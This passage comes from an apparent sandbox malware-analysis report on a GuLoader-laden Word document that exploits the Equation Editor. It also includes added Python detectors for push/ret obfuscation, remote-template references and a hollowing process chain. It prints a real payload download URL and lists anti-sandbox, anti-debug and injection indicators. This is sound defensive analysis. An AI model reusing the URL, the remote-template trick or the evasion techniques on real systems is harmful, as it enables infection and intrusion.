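RET_OPS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(buf: bytes, base: int = 0) -> list[dict]:
    """Return every push immediately followed by a ret-family opcode."""
    hits = []
    for i, op in enumerate(buf):
        if op not in PUSH_OPS:
            continue
        mnemonic, size = PUSH_OPS[op]
        j = i + 1 + size                      # offset of the would-be ret
        if j >= len(buf) or buf[j] not in RET_OPS:
            continue
        imm = None
        if size == 4:
            imm = struct.unpack_from("<I", buf, i + 1)[0]
        elif size == 1:
            imm = buf[i + 1]
            if imm & 0x80:                    # push imm8 is sign-extended to 32 bits
                imm |= 0xFFFFFF00
        hits.append({"va": base + i, "mnemonic": mnemonic, "imm": imm,
                     "ret": RET_OPS[buf[j]]})
    return hits


def assess(hit: dict) -> str:
    """Heuristic triage of one pair (an assumption of this example, not a
    sandbox rule): push imm; ret is an unconditional jump to imm, so a
    target outside the 32-bit user-mode range can never execute and the
    bytes are more likely data or dead code than a working obfuscated jump."""
    if hit["ret"] in ("retf", "iretd"):
        return "far-transfer"         # far returns are rare in 32-bit user code
    if hit["imm"] is None:
        return "register-push"        # pushad/pushfd/push cs: no computed target
    if 0x10000 <= hit["imm"] < 0x7FFF0000:
        return "plausible-jump"
    return "invalid-target"


def describe(hit: dict) -> str:
    """One report-style line: address, pair, and the triage verdict."""
    imm = "" if hit["imm"] is None else f" {hit['imm']:08X}h"
    return f"{hit['va']:08X} {hit['mnemonic']}{imm}; {hit['ret']} [{assess(hit)}]"


# Constructed sample buffer (not bytes from the real sample).
SAMPLE = (
    b"\x90"                            # nop
    + b"\x6A\x85\xC3"                  # push FFFFFF85h ; ret
    + b"\x68\x10\x20\x40\x00\xC3"      # push 00402010h ; ret
    + b"\x60\xC3"                      # pushad ; ret
    + b"\x9C\xCF"                      # pushfd ; iretd
    + b"\x68\x76\x59\xF1\x6A\xCB"      # push 6AF15976h ; retf
    + b"\x0E\xC3"                      # push cs ; ret
)

if __name__ == "__main__":
    for h in find_push_ret(SAMPLE, base=0x2F0000):
        print(describe(h))
```

Run it against a dumped memory region (for instance the 0x2F0000 region of process 0xC) with `base` set to the region's load address to get lines in the same form as the report; hits classified as invalid-target are the ones to discount before concluding the code is control-flow obfuscated.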

Persistence and Installation Behavior:

Contains an external reference to another file
Source: webSettings.xml.rels Extracted files from sample: http://192.3.122.180/......w_w.....w.........-ww........-----www.----............ww--------....ww-/....ww.........-w-w------w-------ww-------......ww......---w.w--ww.w.wbk
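The external reference is carried by the OOXML relationship part word/_rels/webSettings.xml.rels, whose Relationship element has TargetMode="External" and an HTTP Target that Word resolves when the document is opened, with no macro involved (the OLE indicator line above reports vbamacros = False). The script below is an added example, not part of the report or the sample: it unpacks a .docx and lists every external relationship, separating targets Word fetches on its own from ordinary hyperlinks. The sample document it builds, the AUTO_FETCH_TYPES set and the 192.0.2.10 address are constructed for the example.

```python
"""Enumerate external relationships in an OOXML (.docx) package, the
mechanism behind "Contains an external reference to another file"
(here a webSettings.xml.rels target on an HTTP server).
Added example, not code from the sandbox or the sample; the document built
by build_sample_docx() is constructed and uses a documentation IP rather
than the address in the report.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Relationship types Word resolves on open without a click (assumption of
# this example; extend as needed). Hyperlinks are deliberately absent.
AUTO_FETCH_TYPES = {"attachedTemplate", "frame", "oleObject", "image"}


def external_relationships(docx_bytes: bytes) -> list[dict]:
    """Walk every *.rels part and return relationships marked External."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            # NOTE: for untrusted files prefer defusedxml to resist XML bombs.
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                found.append({
                    "part": name,
                    "id": rel.get("Id", ""),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target", ""),
                })
    return found


def is_auto_fetched(rel: dict) -> bool:
    """True when Word would retrieve the target on open: a remote URL
    attached through a relationship type that is not a user-clicked link."""
    scheme = urlsplit(rel["target"]).scheme.lower()
    return scheme in ("http", "https", "ftp", "file") and rel["type"] in AUTO_FETCH_TYPES


def build_sample_docx() -> bytes:
    """Constructed minimal .docx: a webSettings frameset whose source file
    lives on a remote host, plus an ordinary hyperlink for contrast."""
    rels_ns = REL_NS[1:-1]
    web_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{rels_ns}">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" '
        'Target="http://192.0.2.10/payload.wbk" TargetMode="External"/>'
        '</Relationships>'
    )
    doc_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{rels_ns}">'
        '<Relationship Id="rId2" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="https://example.com/" TargetMode="External"/>'
        '<Relationship Id="rId3" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" '
        'Target="webSettings.xml"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", doc_rels)
        pkg.writestr("word/_rels/webSettings.xml.rels", web_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for rel in external_relationships(build_sample_docx()):
        flag = "AUTO-FETCH" if is_auto_fetched(rel) else "link"
        print(f"{flag:10} {rel['part']} {rel['type']} -> {rel['target']}")
```

Point external_relationships() at the bytes of a real attachment to triage it before detonation; a remote frame, attachedTemplate or oleObject target in any .rels part is the indicator, regardless of whether the document carries macros.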
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (44 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior (21 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (4 identical entries)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (5 identical entries)
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (11 identical entries)

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp, CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2940 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406873 FindFirstFileW,FindClose, 9_2_00406873
Source: C:\Users\Public\vbc.exe Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_00405C49
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040290B FindFirstFileW, 9_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe System information queried: ModuleInformation Jump to behavior
Source: vbc.exe, 00000009.00000002.461296548.0000000000544000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp, CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F1822 mov eax, dword ptr fs:[00000030h] 15_2_002F1822
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EB237 mov eax, dword ptr fs:[00000030h] 15_2_002EB237
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EF459 mov eax, dword ptr fs:[00000030h] 15_2_002EF459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F033F mov eax, dword ptr fs:[00000030h] 15_2_002F033F

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 2E0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Rorqu.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: Rorqu.exe, 0000000C.00000002.720546394.0000000001DE0000.00000002.00020000.sdmp, CasPol.exe, 0000000F.00000002.717696945.0000000000CC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Rorqu.exe, 0000000C.00000002.720546394.0000000001DE0000.00000002.00020000.sdmp, CasPol.exe, 0000000F.00000002.717696945.0000000000CC0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: Rorqu.exe, 0000000C.00000002.720546394.0000000001DE0000.00000002.00020000.sdmp, CasPol.exe, 0000000F.00000002.717696945.0000000000CC0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040352D
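The process-creation lines above describe the full chain: EQNEDT32.EXE starts vbc.exe from C:\Users\Public, vbc.exe drops and runs Rorqu.exe from the user's Temp directory, and Rorqu.exe launches CasPol.exe with Rorqu.exe's own path as the command line, which is what hollowing a suspended CasPol.exe and writing to base 2E0000 leaves behind in telemetry. The detector below is an added example rather than anything from the report: it applies those three indicators (Equation Editor child, execution from Public or Temp, image/command-line mismatch) to constructed process events. PIDs, the svchost and WINWORD entries and the -Embedding command line are hypothetical; the other paths and command lines mirror the report.

```python
"""Flag the process chain the report shows (EQNEDT32.EXE -> vbc.exe ->
Rorqu.exe -> CasPol.exe) from process-creation telemetry. Added example,
not part of the sandbox report; the events below are constructed (PIDs and
the WINWORD/svchost entries are hypothetical, the image paths and command
lines mirror the ones listed above).
"""
import ntpath

# Constructed process-creation events in Sysmon Event ID 1 terms.
EVENTS = [
    {"pid": 50, "ppid": 1, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k DcomLaunch"},
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\Desktop\RFQ.docx"'},
    # Equation Editor is COM-activated, so its parent is the DCOM svchost,
    # not WINWORD.EXE: a parent==WINWORD rule would miss it.
    {"pid": 200, "ppid": 50, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\Public\vbc.exe",
     "cmdline": r'"C:\Users\Public\vbc.exe"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\user\AppData\Local\Temp\Rorqu.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\Rorqu.exe"},
    # Hollowed host: image is CasPol.exe but the command line is Rorqu.exe.
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\Rorqu.exe"},
]

# Lower-cased path fragments; compared against the lower-cased image path.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\")


def cmdline_executable(cmdline: str) -> str:
    """Lower-cased basename of the first command-line token, honouring quotes."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        token = s[1:end] if end > 0 else s[1:]
    else:
        token = s.split(" ", 1)[0]
    return ntpath.basename(token).lower()


def ancestry(pid: int, events: list[dict]) -> list[str]:
    """Image basenames from pid up to the root, e.g. CasPol.exe ... svchost.exe."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Return (pid, rule) findings for the indicators the report lists."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        # Office equation editor starting a process (CVE-2017-11882 style)
        if parent and ntpath.basename(parent["image"]).lower() == "eqnedt32.exe":
            findings.append((e["pid"], "equation_editor_child"))
        # Execution from a world-writable or temp location
        if any(d in image for d in SUSPICIOUS_DIRS):
            findings.append((e["pid"], "suspicious_folder"))
        # Image/command-line mismatch: typical of process hollowing
        if cmdline_executable(e["cmdline"]) != ntpath.basename(image):
            findings.append((e["pid"], "image_cmdline_mismatch"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}  chain={' <- '.join(ancestry(pid, EVENTS))}")
```

The mismatch rule is the one that survives renaming of the dropped files: a legitimate CasPol.exe launch carries CasPol.exe on its own command line, so an image path under Microsoft.NET paired with a command line under AppData\Local\Temp needs no knowledge of the Rorqu.exe name.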

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior